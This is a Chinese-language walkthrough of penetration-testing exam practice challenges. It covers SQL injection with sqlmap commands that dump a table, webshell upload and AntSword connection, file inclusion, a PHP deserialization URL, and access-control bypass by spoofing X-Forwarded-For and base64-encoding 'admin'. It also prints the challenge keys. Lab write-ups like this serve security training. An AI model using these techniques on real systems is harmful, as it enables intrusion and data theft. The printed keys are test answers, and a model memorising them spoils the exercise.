1.SQL注入
直接sqlmap跑一下
python sqlmap.py -u url --dbs
爆个表
python sqlmap.py -u url -D 2web --tables
爆列
python sqlmap.py -u url -D 2web -T IS_KEY --columns
接下来查看下内容
python sqlmap.py -u url -D 2web -T IS_KEY -C haha --dump
拿到key1:abcd1234
2.文件上传
发现是php的页面
发现上传失败,改改
改完传好了
找到路径,直接访问下
蚁剑连接
找到key.php,打开找到key2:a1b2c3d4
3.文件包含
查看url发现,强制添加.txt后缀
把第二题马改成.txt后缀的
访问下看看
返回题目访问下
蚁剑连接
找key
找到key3:abcdefgh
4.反序列化
来看一下php类型反序列化格式
s:3:"123";
<?php
echo serialize("123");
?>
编辑器看下文字长度
编辑下url
http://121.36.208.140:8894/start/index.php?str=s:44:"Whatever is worth doing is worth doing well.";
运行下得到key4:123456768
5.失效的访问控制
bp抓包访问下
发现只允许本地访问
改下
X-Forwarded——For:127.0.0.1
发现没有查看权限
发现username为url编码--->base64
bp解下码
然后把admin编码
复制替换拿到key5:12345678
结束
原文始发于微信公众号(CTS纵横安全实验室):PTE练习题解答
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论